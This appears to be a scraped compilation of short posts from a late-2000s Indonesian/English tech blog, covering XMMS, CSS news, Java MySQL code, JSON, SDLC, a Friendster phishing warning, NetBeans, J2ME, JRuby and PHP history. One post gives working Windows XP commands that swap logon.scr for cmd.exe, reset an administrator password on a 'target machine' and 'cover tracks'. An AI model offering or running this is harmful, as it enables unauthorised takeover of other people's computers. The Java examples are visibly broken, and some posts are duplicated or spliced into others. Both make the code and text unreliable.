Linux With XMMS

Walau minimalist, Slackware ternyata menyediakan XMMS sehingga kita bisa mendengar musik sambil bekerja. Hanya saja ada sedikit tips agar musik anda tidak mengganggu program lain.

Di Slackware, XMMS ada di paket XAP, dan mestinya sudah terpasang saat instalasi. Kalau belum gunakan pkgtool. Sementara itu desktop XFce sudah menyediakan peluncur xmms, tinggal klik.

Kalau sudah jalan, mestinya anda sudah tahu cara memakainya. XMMS bisa memainkan beberapa format musik seperti MP3, OrgVobis maupun Audio-CD. Tinggal masukkan ke PlayList lalu klik tombol Play.

Biar tampilannya keren, XMMS-nya diberi kulit baru (skin). Caranya:

  1. Download skin dari situs xmms Ada ratusan skin disitu.
  2. Taruh skin tersebut di direktori ~/.xmms/Skin. Langsung saja dalam bentuk *.zip, *.tar.gz maupun *.tar.bz2, tidak perlu di ekstrak.
  3. Dari xmms tekan Alt-S (browse Skins). Nah, tinggal pilih.

Penampilan sudah, sekarang soal suara. Coba jalankan xmms, lalu klik ikon kecil di kiri atas, lalu pilih menu Options-Preferences. Pada kotak dialog, tab Audio I/O plugins, ada bagian output plugins. Di situ ada beberapa pilihan. Dari coba-coba, ternyata plugins ini mempengaruhi kualitas suara.

  • OSS Driver: suara langsung dikirim ke hardware, karenanya beban CPU rendah (0-1%), dan suara jelas tapi tajam.
  • eSound: dengan plugin ini, suara akan dikirim dulu ke suatu daemon bernama esd, baru di kirim ke hardware. Jadi ada beban CPU (1-2%), dan ternyata suaranya jadi rada kemresek.
  • aRts driver: Mula-mula saya kaget karena tidak jalan, padahal tadinya jalan. Saya ingat-ingat lagi, waktu jalan dulu saya pakai KDE, bukan XFCE. Arts ini memang bawaannya KDE, dan ternyata dia perlu daemon tersendiri. Kalau di KDE, daemonnya akan otomatis dijakankan, kalau di XFCE terpaksa manual. Jadi saya buka terminal lalu panggil:
    tux@jawa:$ /opt/kde/bin/artsd
    Nah, sekarang suaranya bisa keluar, dan ternyata lebih bening dibanding OSS ! Wow, hebat KDE. Cuma sayangnya artsd makan CPU sampai 4-5%.

XMMS dengan skin Ultrafina. Disebelahnya, top sedang mengukur beban CPU.

Data soal beban CPU itu saya ukur dengan program top, hasilnya pasti obyektif. Sementara itu, soal kualitas suara ... cuma pakai telinga saja. Jadi bisa didebat. Sudah begitu, speaker saya cuma di Laptop.

Jadi kalau pengen beban CPU ringan, dan kuping anda tidak audiophile banget, atau anda punya speaker Altec Langsing, pakai saja driver OSS. Anda mungkin perlu eSound atau arts kalau beberapa aplikasi ingin mengakses sound secara bersamaan (misal jalan 2 XMMS atau XMMS + MPlayer atau XMMS + games).

How to learn css

(For announcements of new CSS (draft) specifications, see “CSS current work.”)

  • 2008-12-11 W3C has launched a donations programs to support the (HTML, CSS, etc.) validators. The validators are very popular, but running them is expensive. If you can help, with money, or as a fundraiser, please do!
  • 2008-12-09 Antenna House released the AH Formatter version 5.0 beta to format XML and (X)HTML documents for print or PDF. It handles both CSS and XSL and includes CSS 2.1, Paged Media, GCPM, Multi-column, Vertical Text, etc. It also supports SVG and MathML. (Windows; restricted evaluation version)
  • 2008-12-04 The organizers of the Web Directions conferences and Scroll Magazine are conducting a survey (aimed at Web designers and developers) about current (best) practices in developing Web content. It runs until December 20.
  • 2008-12-04 SyncRO Soft released version 10 of the XML Editor and XSLT Debugger, which includes editors for XML, XSLT, XQuery, etc, and also a (validating) CSS editor. (Windows, Mac, Linux, Java; free trial)
  • 2008-12-03 The CSS Working Group has been rechartered until December 2010. The most notable difference to the previous charter is that work is expected to end during this period on about ten of the most stable and most requested modules.
  • 2008-11-25 Google has made a beta version available of its Chrome Web browser. (free, partly Open Source; Windows)
  • 2008-11-14 Oiko Software published version 1.00RC1 of their Oiko CSS editor. (Windows, free)
  • 2008-10-01 W3C is investigating if a font embedding solution for the Web is possible that is compatible with '@font-face' and based on EOT. A report summarizes the discussion so far.
  • 2008-09-03 Antenna House [English/Japanese] released Antenna House Formatter Preview Version [English/Japanese], a formatter that supports CSS 2.1, CSS3 Paged Media, GCPM, Multi-column, Vertical Text, etc. for XML and (X)HTML documents. Also supports SVG, MathML, and XSL-FO. (Windows, free technology preview version)
  • 2008-08-13 Bert Bos and others will present at the Dutch Fronteers 2008 conference in Amsterdam on 11–12 September. The conference is targeted at front-end developers and this year's two themes are CSS and JavaScript.
  • 2008-07-09 The browser maker Opera, in association with the Yahoo Developer Network, offers courses in standards-based Web development aimed at universities, schools and other institutions. The courses consist of several dozen chapters, downloadable for free.
  • 2008-06-19 Skybound offers a free version of Stylizer Basic (formerly StyleSpread) in addition to the non-free Stylizer Ultimate. Stylizer is a CSS editor with live preview, automatic validation, diagnose tool, FTP upload, etc. (Windows, free basic version)
  • 2008-06-19 JAPISoft offers EditiX, an XML & XML Schema editor and XSLT debugger. EditiX also includes a CSS editor. (Windows, Mac OS X & Linux; free version available for non-commercial use)
  • 2008-06-19 Opera released version 9.50 of its browser, with support for CSS level 2 and parts of level 3. (multiple platforms, including cell phones, free on most platforms)
  • 2008-06-19 Mozilla released version 3 of the Firefox Web browser, with support for CSS level 2 and parts of level 3. (Various platforms, Open Source)

This is link for learn css from :

Connection Database

Ini adalah sample koneksi database menggunakan MYSQL yang sederhana..
Disini saya akan memberikan contoh class connection MYSQL beserta cara penggunaannya.
Sebelumnya saya akan menjelaskan sedikit untuk methode pada class ConMysql.

Method dari selectQuery bertujuan untuk mengambil data dari database. dan akan mengembalikan data dengan nilai result berType "ResultSet". Sedangkan untuk method updateQuery bertujuan untuk mengupdate, delete, dan akan mengembalikan data result berType "boolean". langsung mulai aja yach..

Isi pada

package org.kopiitem.util;
* User: akiralie
* Date: May 21, 2007
* Time: 10:15:31 AM
import java.sql.Connection;
import java.sql.SQLException;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

public class ConMysql {
Connection conn = null;
Statement st = null;
ResultSet rs = null;

public void open() {
try {
conn = DriverManager.getConnection(
"jdbc:mysql://localhost/sks", "root", "xxx");
System.out.println("== Success Connect ==");
} catch (IllegalAccessException e) {
} catch (ClassNotFoundException e) {
} catch (InstantiationException e) {
} catch (SQLException e) {

public ResultSet selectQuery(String query) {
try {
st = conn.createStatement();
rs = st.executeQuery(query);
} catch (SQLException sqle) {
return rs;

public boolean updateQuery(String query) {
boolean status = false;
try {
st = conn.createStatement();
status = st.execute(query);
} catch (SQLException sqle) {
return status;

public void close() {
try {
if (!conn.isClosed()) {
} catch (SQLException e) {

dan ini adalah cara penggunaan dari class diatas

isi pada

package org.kopiitem.main;
* User: akiralie
* Date: May 21, 2007
* Time: 10:15:31 AM
import org.kopiitem.util.ConMysql;

import java.sql.ResultSet;

public class MainApp {
public static void main(String[] args) {
ResultSet rs = null;
ConMysql conn = new ConMysql();
String query = "SELECT * FROM USER";
try {;
rs = conn.selectQuery(query);
while ( {
System.out.println("Data : " + rs.getString("firstname"));
} catch (Exception e) {



Result dari MainApp akan menghasilkan :

== Success Connect ==
Data : System
Data : User

Okay Sekian dulu untuk info nya ya.. he he he tetap Smangat buat belajar java..

Writen By

~ Donny Lie ~

What is Json

JSON short for JavaScript Object Notation, is a lightweight computer data interchange format. It is a text-based, human-readable format for representing simple data structures and associative arrays (called objects).

The JSON format is specified in RFC 4627 by Douglas Crockford. The official Internet media type for JSON is application/json. The JSON file extension is .json.

The JSON format is often used for transmitting structured data over a network connection in a process called serialization. Its main application is in Ajax web application programming, where it serves as an alternative to the use of the XML format.

Although JSON was based on a subset of the JavaScript programming language (specifically, Standard ECMA-262 3rd Edition—December 1999) and is commonly used with that language, it is considered to be a language-independent data format. Code for parsing and generating JSON data is readily available for a large variety of programming languages. The website provides a comprehensive listing of existing JSON bindings, organized by language.

In December 2005, Yahoo! began offering some of its web services optionally in JSON. Google started offering JSON feeds for its GData web protocol in December 2006.

SON's basic types are:

The following example shows the JSON representation of an object that describes a person. The object has string fields for first name and last name, contains an object representing the person's address, and contains a list of phone numbers (an array).

"firstName": "John",
"lastName": "Smith",
"address": {
"streetAddress": "21 2nd Street",
"city": "New York",
"state": "NY",
"postalCode": 10021
"phoneNumbers": [
"212 555-1234",
"646 555-4567"

System Development Life Cycle

Beberapa waktu lalu beberapa temen bertanya pada saya seputar metodelogi pengembangan System Development Life Cycle Model (SDLC Model) atau juga dikenal dengan metodelogi Classic Life Cycle Model (CLCM)/ Linear Sequential Model (LSM)/Waterfall Method.

Karena itu, maka pada tulisan kali ini saya mencoba menjawab pertanyaan tersebut.

Metodelogi pengembangan System Development Life Cycle Model (SDLC Model) ini adalah metodelogi yang didasarkan pada beberapa aktifitas berikut :

1. System/Information Engineering and Modeling
Pengembangan sistem informasi dimulai dengan mengadakan penelitian terhadap elemen-elemen kebutuhan sistem bersangkutan dan mendefinisikan kebutuhan-kebutuhan tersebut dan menjabarkannya kedalam panduan bagi pengembangan sistem ditahap berikutnya. Aspek-aspek yang berkaitan berupa elemen-elemen yang berkaitan dengan sistem baik itu sumber daya manusia, peraturan perundang-undangan, perangkat keras (hardware), prosedur kerja organisasi maupun beragam aspek lainnya, baik yang terkait secara langsung maupun tidak dengan sistem komputerisasi yang akan dibangun. Fase ini merupakan fase yang sangat penting (essential) untuk mendapatkan gambaran utuh sistem guna pengembangan sistem bersangkutan kedalam bentuk penerapan sistem yang berbasis komputerisasi.

2. Software Requirements Analysis
Tahapan ini juga dikenal sebagai proses feasibility study. Dalam tahapan ini, tim pengembang sistem melakukan investigasi kebutuhan-kebutuhan sistem guna menentukan solusi piranti lunak (software) yang akan digunakan sebagai tulang punggung proses automatisasi /komputerisasi bagi sistem. Hasil investigasi berupa rekomendasi kepada pengembang sistem dalam hal spesifikasi teknis proses pengembangan sistem untuk tahap berikutnya yang berisikan hal-hal berkaitan dengan kebutuhan personal (personnel assignments), biaya (costs), jadwal pelaksanaan (project schedule), and batasan waktu penyelesaian pekerjaan (target dates). Disamping itu juga direkomendasikan beragam aspek teknis pengembangan software baik berupa fungsi-fungsi yang dibutuhkan (required function), karakteristik sistem (behavior), performansi sistem (performance) and antar muka aplikasi (interfacing).

3. Systems Analysis and Design
Pada tahapan ini, tim pengembangan sistem mendefinisikan proses-proses dan kebutuhan-kebutuhan sistem yang berkaitan dengan pengembangan aplikasi (software development process). Dalam fase ini ditentukan pemilihan teknologi yang akan diterapkan baik berupa client/server technology, rancangan database, maupun beragam aspek lainnya yang berkaitan dengan kegiatan analisis dan perancangan ini.

4. Code Generation
Pada tahapan ini hasil dari fase-fase sebelumnya dituangkan kedalam penulisan kode-kode dengan menggunakan bahasa pemrograman komputer yang telah ditentukan dalam tahap sebelumnya. Untuk melakukan pemrograman ini dibutuhkan perangkat-perangkat pemrograman seperti Code Editor, Compiler, Interpreter dan aneka perangkat lunak berkaitan lainnya sesuai dengan kebutuhan pemrograman bersangkutan.

5. Testing
Setelah proses penulisan kode pemrograman langkah berikutnya berupa proses pengujian terhadap hasil pemrograman tersebut . Pengujian mencakup beragam aspek yang berkaitan dengan System & Performance dari fase Code Generation. Pengujian-pengujian tersebut berupa Pengujian Database, Pengujian Validitas Data, Pengujian Logic Aplikasi, Pengujian Antar Muka Aplikasi (General User Interface/GUI), Pengujian User Administration. Hasil pengujian ini merupakan Umpan balik perbaikan System & Performance yang akan digunakan dalam proses perbaikan sistem hingga mencapai hasil yang diharapkan dan telah ditentukan sebelumnya.

6. Maintenance
Fase ini merupakan fase perawatan terhadap sistem yang telah dikembangkan dan diimplementasikan. Cakupan fase ini berupa proses perawatan terhadap sistem yang berkaitan dengan perawatan berkala dari sistem maupun proses terhadap perbaikan sistem manakala sistem menghadapi kendala dalam operasionalnya akibat masalah teknis dan non teknis yang tidak terindikasi dalam proses pengembangan sistem. Proses Maintenance ini juga meliputi upaya-upaya pengembangan terhadap sistem yang telah dikembangkan sebelumnya dalam menghadapi mengantisipasi perkembangan maupun perubahan sistem bersangkutan.

Kumpulan Situs IT Indonesia

Berikut daftar link untuk mendapatkan berita terbaru & menarik seputar dunia teknologi informasi dan hal-hal menarik yang berkaitan lainnya :

Anda sudah tahu YouTube? Ternyata selain YouTube di Internet banyak sekali situs yang menyediakan layanan untuk download video serta sharing video gratis.
Pada artikel ni penulis akan menginformasikan koleksi lengkap situs tempat kita bisa mencari video dan mendownload gratis di internet.

10 Situs Video Sharing terpopuler menurut

No Nama Situs Video Url
2 VideoEgg
3 Dailymotion
4 YouTube
5 Veoh
6 Google Video
7 Grouper
8 Jumpcut
10 Eyespot

Daftar Situs Video Sharing lain:

No Nama Situs Video Url
1 Addictingclips
3 Blastro
5 Bolt
7 CastPost
8 Clipfish
9 ClipShack
11 Current TV
12 Dabble
15 Eefoof
16 EngageMedia
17 Evtv1
18 ExpertVillage
19 Filecow
20 FlickDrop
21 Fligz
22 Flixya
23 Flurl
24 GodTube
25 Gofish
28 iFilm
29 JibJab
30 LiveVideo
31 Lulu TV
32 ManiaTV
33 Metacafe
34 Motionbox
35 MSN Soapbox
36 Myspace
37 MyVideo
38 OneWorldTV
39 Openvlog
40 Ourmedia
41 Pandora TV
42 Panjea
43 Peekvid
44 Phanfare
45 Pickle
46 Putfile
47 Revver
48 SceneMaker
49 Sharkle
50 Stage6
52 TheVideoSense
53 Tudou
54 Twango
55 UVU Video Sharing
56 Veoh
57 Video Webtown
58 VidiLife
59 Vimeo
60 vMix
61 Vobbo
62 Vodpod
63 Vsocial
64 Webshots
65 Woomu
66 Yikers
68 ZippyVideos
69 Zooppa

Fake Friendster

Beberapa hari belakangan ini profile di Friendster saya tidak bisa dibuka. Apabila mengakses profile saya di FS, maka akan muncul halaman login seakan terjadi error pada FS dan meminta anda login kembali. Berikut tampilannya :


Apabila diperhatikan, alamat situs itu bukan, melainkan! Mungkin bagi kebanyakan pengguna akan serta merta memasukkan email dan passwordnya. Tapi setelah saya liat2.. ternyata itu adalah situs Friendster Palsu! Halaman itu bertujuan untuk mengambil email dan password kita dan mengirimkannya ke tempat lain menggunakan script PHP dari alamat “” (bisa dilihat pada source code HTML-nya).

Setelah saya teliti.. ternyata hal ini bisa terjadi akibat testimonial yang menggunakan flash atau sejenisnya (saya lupa.. soalnya udah diapus) yang bisa me-redirect halaman profile kita ke alamat lain. Misalnya yang tadinya ingin membuka alamat akan di-redirect menjadi

Setelah saya cek menggunakan ARIN WHOIS, IP (IP dari script yg digunakan) menghasilkan informasi berikut :

Search results for:

OrgName:    Columbus Network Access Point, Inc.
Address: 50 W, Broad St, Suite 627
City: Columbus
StateProv: OH
PostalCode: 43215
Country: US

Sedangkan memiliki IP dengan informasi berikut :

Search results for:

OrgName:    Globix Corporation
Address: 139 Centre Street
City: New York
StateProv: NY
PostalCode: 10013
Country: US

Jadi sangat jelas bahwa script PHP itu BUKAN script dari Friendster.

Untuk itu.. saya menghimbau kepada temen2 yang sudah pernah memasukkan email dan password melalui halaman Friendster Palsu untuk SEGERA mengganti password. Sedangkan bagi yang belum pernah.. berhati-hatilah. Dan jangan lupa.. bagi yang mengkases Friendster melalui tempat umum (warnet atau lab), ada baiknya untuk menghapus cookies pada browser terlebih dahulu.

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called djarot and you want the password blah enter this

"net user djarot blah"

and this changes the password on djarot machine to blah and your in.

Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Happy Mother's Day

Mother. Probably the greatest gift that one can ever receive in a lifetime. It's her love that makes you strong. It's her care that prepares you to face the world. It's her hands that help you to overcome all the trying times of life. It's Mother's Day once more. The time to give back your mother a fraction of the love and care that she showered on you all her life. Celebrate this Mother's Day in the best possible way with TheHolidaySpot. Make your mom feel special with our wide assortment of cards, screensavers, wallpapers, crafts, recipes, personalized mother's day gifts and what not. You can also try the special greetings, or the printable to write a hand written message, or make her "Queen of the feast", or wish her in many languages! Why wait then? Have a fun-filled ride through our splendid Mother's Day section. If you like our amazing Mother's Day section, you can tell to your story about your mom, to all your friends and let them share the fun. A very happy Mother's Day 2008 to all our friends and their mothers. Cheerrsss!

I love u Mom...

What is EJB

Enterprise JavaBeans (EJB) is a server-side component architecture that simplifies
the process of building enterprise-class distributed component applications
in Java. By using EJB, you can write scalable, reliable, and secure
applications without writing your own complex distributed component
framework. EJB is about rapid application development for the server side;
you can quickly and easily construct server-side components in Java by leveraging
a prewritten distributed infrastructure provided by the industry. EJB is
designed to support application portability and reusability across any vendor’s
enterprise middleware services.
If you are new to enterprise computing, these concepts will be clarified
shortly. EJB is a complicated subject and thus deserves a thorough explanation.
In this chapter, we’ll introduce EJB by answering the following questions:

  • What plumbing do you need to build a robust distributed object deployment?
  • What is EJB, and what value does it add?
  • Who are the players in the EJB ecosystem?

Please Download e-Book From Here

What Is Corba ?

It’s holding together the enterprise,
where reliability is important and many different platforms and operating
systems must work together to get the job done in the most robust way possible.
Even though the desktop corner in the upper left dominates in sheer
numbers of machines, the enterprise portion is where the action (and the
money!) concentrates:
of the requests from
of the clients on the left,
of every machine type, execute on the far smaller number of enterprise
machines on the right.
These machines are going to be stressed: High volumes of network traffic
and requests—coming from millions of machines of various types and
shapes over radio, cable, fiber, and copper links—funnel down to these
servers. If you’re a provider of a service in this part of the diagram, you
need two things: First, you need the freedom to pick the
best possible
and software for your job, since second-rate just won’t cut it in this
high-pressure environment; second, you need platform-independent, scalable,
robust interoperability so that your best-of-breed hardware and software
integrate smoothly with the rest of your enterprise. CORBA gives this
to you, and enterprise architects already realize this. If you can get this in
an infrastructure that is transactional and secure, which CORBA is, so
much the better.

Please Download e-Book From Here Quick_Corba.rar

NetBeans 6.5 Release

A free, open-source Integrated Development Environment for software developers. You get all the tools you need to create professional desktop, enterprise, web, and mobile applications with the Java language, C/C++, and even dynamic languages such as PHP, JavaScript, Groovy, and Ruby. NetBeans IDE is easy to install and use straight out of the box and runs on many platforms including Windows, Linux, Mac OS X and Solaris.

The NetBeans IDE 6.5 provides several new features and enhancements, such as rich PHP, JavaScript and Ajax editing features, improved support for using the Hibernate web framework and the Java Persistence API, and tighter GlassFish v3 and MySQL integration.

Release Overview

In addition to full support of all Java platforms (Java SE, Java EE, Java ME, and JavaFX), the NetBeans IDE 6.5 is the ideal tool for software development with PHP, Ajax and JavaScript, Groovy and Grails, Ruby and Ruby on Rails, and C/C++. The 6.5 release provides enhanced support for web frameworks (Hibernate, Spring, JSF, JPA), the GlassFish application server, and databases. Additionally it includes a new IDE-wide QuickSearch shortcut, a more user-friendly interface, and automatic Compile on Save.

Please download netbeans 6.5 in here NetBeans 6.5

Sample J2ME With Hello World

Many People Confuse how can develop using java MIDlet application. Actually we just need WTK ( emulator for MIDlet) / Wireless Toolkit

System Requirements

Required Software

One of the following operating environments:

  • Microsoft Windows XP or Microsoft Windows 2000 are the officially supported platforms.
  • SolarisTM 8
  • Linux
  • Java Desktop System

Java 2 SDK, Standard Edition (J2SE SDK), version 1.4.2 - if you plan to do actual development, or Java 2, Standard Edition Runtime Environment (JRE), version 1.4.2 - if you only plan to run the demo applications.

To download the SDK or JRE you want, go to .

Note: The Solaris and Linux versions of the toolkit are unsupported and have undergone only limited testing. The Solaris operating environment was tested only on English versions of Solaris 8. The Linux version was tested only on English Red Hat Linux 7.2., and Java Desktop System.

Optional Software

SunTM ONE Studio 5, Mobile Edition IDE Early Access- m/software/sundev/jde/studio_me/early_access.html. This release of Mobile Edition provides specific support with the J2ME WTK 2.1.

Require Hardware

Minimum hardware requirements are:

  • 50 MB hard disk
  • 64 MB system RAM
  • 166 MHz CPU

Optional items:

  • A SoundBlaster-compatible sound card for Windows machines without built-in audio support.
  • A display adapter with a minimum color depth of 16 bits.

Installing the J2ME Wireless Toolkit

  • Microsoft Windows operating environment: To install the toolkit, run the installer, j2me_wireless_toolkit-2_1_01-windows.exe. Follow the instructions the provided by the installer.
  • Solaris 8 operating environment: To install the toolkit, run the self-extracting installer, j2me_wireless_toolkit-2_1_01-solsparc.bin. If you want to install the Wireless Toolkit into a directory that requires root access, become the root user before running the installer.
  • Linux RedHat 7.2 operating environment: To install the toolkit, run the self-extracting installer, j2me_wireless_toolkit-2_1_01-linux-i386.bin. If you want to install the Wireless Toolkit into a directory that requires root access, become the root user before running the installer.
Please Download WTK for J2ME in here

Example For JRuby

JRuby 1.0.3 was recently released and so was Rails 2.0. I decided to try JRuby 1.0.3 + Rails 2.0 and realized that a few additional steps (because of Rails 2.0) are required to get a trivial Hello World applcation up and running. Here are the steps:

  1. Unzip JRuby 1.0.3.
    1. Make sure to set JAVA_HOME and JRUBY_HOME.
    2. Also include JAVA_HOME/bin and JRUBY_HOME/bin in PATH for convenience.
  2. Install Rails 2.0 as shown below:

    ~/samples/jruby arungupta$ jruby -S gem install rails --include-dependencies --no-ri --no-rdoc
    Bulk updating Gem source index for:
    Successfully installed rails-2.0.2
    Successfully installed activesupport-2.0.2
    Successfully installed activerecord-2.0.2
    Successfully installed actionpack-2.0.2
    Successfully installed actionmailer-2.0.2
    Successfully installed activeresource-2.0.2
  3. Create a simple app using the following steps
    1. Create a template app as:

      jruby -S rails --database mysql hello or jruby -S rails -d mysql hello

      It's important to specify --database mysql otherwise Rails 2.0 uses sqlite3 as the default database.
    2. Add a Controller and View as:

      cd hello
      jruby script/generate controller say hello
    3. Edit the controller as:

      vi app/controllers/say_controller.rb

      and add the following variable in "hello" helper method:

      @hello_string = ""
    4. Edit the View as:

      vi app/views/say/hello.html.erb

      and add the following as last line:

      <%= @hello_string %>

      Notice, the view extension is .html.erb instead of .rhtml.
  4. Download, Install and Configure MySQL (additional step for Rails 2.0)
    1. Mac OS comes pre-installed with MySQL in /usr/local/mysql directory. Start the server as:

      sudo ./bin/mysqld_safe

      Alternatively, you can download and install MySQL Universal server (only .dmg format, not tar.gz format as specified here).
    2. Create a database as:

      sudo ./bin/mysqladmin create hello_development
  5. Start the WEBrick server (in hello directory) as:

    jruby script/server
Have Nice Try... :p

Sejarah PHP

PHP pertama kali dibuat oleh Rasmus Lerdorf pada tahun 1995. Pada waktu itu PHP masih bernama FI (Form Interpreted), yang wujudnya berupa sekumpulan script yang digunakan untuk mengolah data form dari web.

Selanjutnya Rasmus merilis kode sumber tersebut untuk umum dan menamakannya PHP/FI, kependekan dari Hypertext Preprocessing'/Form Interpreter. Dengan perilisan kode sumber ini menjadi open source, maka banyak programmer yang tertarik untuk ikut mengembangkan PHP.

Pada November 1997, dirilis PHP/FI 2.0. Pada rilis ini interpreter PHP sudah diimplementasikan dalam program C. Dalam rilis ini disertakan juga modul-modul ekstensi yang meningkatkan kemampuan PHP/FI secara signifikan.

Pada tahun 1997, sebuah perusahaan bernama Zend menulis ulang interpreter PHP menjadi lebih bersih, lebih baik, dan lebih cepat. Kemudian pada Juni 1998, perusahaan tersebut merilis interpreter baru untuk PHP dan meresmikan rilis tersebut sebagai PHP 3.0.

Pada pertengahan tahun 1999, Zend merilis interpreter PHP baru dan rilis tersebut dikenal dengan PHP 4.0. PHP 4.0 adalah versi PHP yang paling banyak dipakai pada awal abad ke-21. Versi ini banyak dipakai disebabkan kemampuannya untuk membangun aplikasi web kompleks tetapi tetap memiliki kecepatan dan stabilitas yang tinggi.

Pada Juni 2004, Zend merilis PHP 5.0. Dalam versi ini, inti dari interpreter PHP mengalami perubahan besar. Versi ini juga memasukkan model pemrograman berorientasi objek ke dalam PHP untuk menjawab perkembangan bahasa pemrograman ke arah paradigma berorientasi objek. is proud to announce the availability of NetBeans IDE 6.5!

NetBeans IDE 6.5 offers simplified and rapid development of web, enterprise, desktop, and mobile applications with PHP, JavaScript, Java, C/C++, Ruby, and Groovy.

New features include a robust IDE for PHP, JavaScript debugging for Firefox and IE, and support for Groovy and Grails. The release also delivers a number of enhancements for Java, Ruby on Rails, and C/C++ development. Java highlights include: built-in support for Hibernate, Eclipse project import, and compile on save. Combining excellent out of the box experience, compelling features, and a great plugin ecosystem, NetBeans IDE 6.5 is a must-download for all developers.

NetBeans IDE 6.5 is currently available in English, Japanese, Simplified Chinese and Brazilian Portuguese. There are several community contributed localization efforts underway to support additional languages. Join the efforts today.

More information about NetBeans IDE 6.5:

Database Connection With Mysql

Ini adalah sample koneksi database menggunakan MYSQL yang sederhana..
Disini saya akan memberikan contoh class connection MYSQL beserta cara penggunaannya.
Sebelumnya saya akan menjelaskan sedikit untuk methode pada class ConMysql.

Method dari selectQuery bertujuan untuk mengambil data dari database. dan akan mengembalikan data dengan nilai result berType "ResultSet". Sedangkan untuk method updateQuery bertujuan untuk mengupdate, delete, dan akan mengembalikan data result berType "boolean". langsung mulai aja yach..

Isi pada

package org.kopiitem.util;
* User: akiralie
* Date: May 21, 2007
* Time: 10:15:31 AM
import java.sql.Connection;
import java.sql.SQLException;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

public class ConMysql {
Connection conn = null;
Statement st = null;
ResultSet rs = null;

public void open() {
try {
conn = DriverManager.getConnection(
"jdbc:mysql://localhost/sks", "root", "xxx");
System.out.println("== Success Connect ==");
} catch (IllegalAccessException e) {
} catch (ClassNotFoundException e) {
} catch (InstantiationException e) {
} catch (SQLException e) {

public ResultSet selectQuery(String query) {
try {
st = conn.createStatement();
rs = st.executeQuery(query);
} catch (SQLException sqle) {
return rs;

public boolean updateQuery(String query) {
boolean status = false;
try {
st = conn.createStatement();
status = st.execute(query);
} catch (SQLException sqle) {
return status;

public void close() {
try {
if (!conn.isClosed()) {
} catch (SQLException e) {

dan ini adalah cara penggunaan dari class diatas

isi pada

package org.kopiitem.main;
* User: akiralie
* Date: May 21, 2007
* Time: 10:15:31 AM
import org.kopiitem.util.ConMysql;

import java.sql.ResultSet;

public class MainApp {
public static void main(String[] args) {
ResultSet rs = null;
ConMysql conn = new ConMysql();
String query = "SELECT * FROM USER";
try {;
rs = conn.selectQuery(query);
while ( {
System.out.println("Data : " + rs.getString("firstname"));
} catch (Exception e) {



Result dari MainApp akan menghasilkan :

== Success Connect ==
Data : System
Data : User

Okay Sekian dulu untuk info nya ya.. he he he tetap Smangat buat belajar java..

Source Dapat di download di sini

Okay Chears....

Written By

~ Donny Lie ~

Emotion For Yahoo

Code emoticon For yahoo:

big grin:Dbig grin
batting eyelashes;;)batting eyelashes
big hug>:D<big hug
love struck:xlove struck
broken heart=((broken heart
straight face:|straight face
raised eyebrow/:)raised eyebrow
rolling on the floor=))rolling on the floor
talk to the hand=;talk to the hand
call me - New!:-ccall me - New!
on the phone - New!:)]on the phone - New!
at wits' end - New!~X(at wits' end - New!
wave - New!:-hwave - New!
time out - New!:-ttime out - New!
daydreaming - New!8->daydreaming - New!
rolling eyes8-|rolling eyes
don't tell anyone:-$don't tell anyone
not talking[-(not talking
puppy dog eyes - New!:o3puppy dog eyes - New!
I don't know:-??I don't know
not listening%-(not listening
good luck%%-good luck
money eyes$-)money eyes
feeling beat upb-(feeling beat up
peace sign:)>-peace sign
shame on you[-Xshame on you
bring it on>:/bring it on
hee hee;))hee hee
not worthy^:)^not worthy
oh go on:-joh go on
yin yang(%)yin yang

Best Regards,

~ Donny Lie ~